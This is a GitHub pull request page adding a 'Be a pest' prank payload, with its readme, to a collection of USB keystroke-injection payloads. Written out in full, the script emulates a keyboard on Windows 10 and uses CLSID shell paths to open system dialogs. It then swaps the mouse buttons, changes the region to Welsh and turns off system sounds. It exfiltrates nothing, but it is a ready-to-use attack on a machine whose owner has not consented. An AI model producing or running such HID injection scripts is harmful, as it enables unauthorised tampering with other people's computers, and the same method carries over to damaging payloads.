Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New Payload - Be a pest #535

Merged
merged 2 commits into from
Jun 22, 2022
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
51 changes: 51 additions & 0 deletions payloads/library/prank/Win_HID_BeAPest/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
# Title: Be a pest using CLSID
# Description: Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows 10
# Attackmodes: HID

LED SETUP

ATTACKMODE HID

# GET SWITCH_POSITION

LED ATTACK

QUACK DELAY 200
# Swop Mouse buttons L <-> R
RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}"
QUACK DELAY 200
QUACK SPACE
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Set region to Welsh
RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}"
QUACK DELAY 200
# Walser (Switzerland)
QUACK w
QUACK DELAY 100
# Welsh
QUACK w
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Turn off system sounds
RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}"
QUACK DELAY 200
QUACK SHIFT TAB
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK TAB
QUACK DELAY 100
QUACK UPARROW
QUACK DELAY 100
QUACK ENTER

LED FINISH
25 changes: 25 additions & 0 deletions payloads/library/prank/Win_HID_BeAPest/readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
# Be A Pest Using CLSID
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10
- Category: General
- Attackmode: HID
- Extensions: Run

## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |

## Description
Uses CLSID to open system dialogs.
To swap the left and right mouse button.
Change the region to Welsh.
And turn off system sounds.

## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Keystrokes |
| FINISHED | Green blink followed by SOLID | Injection finished |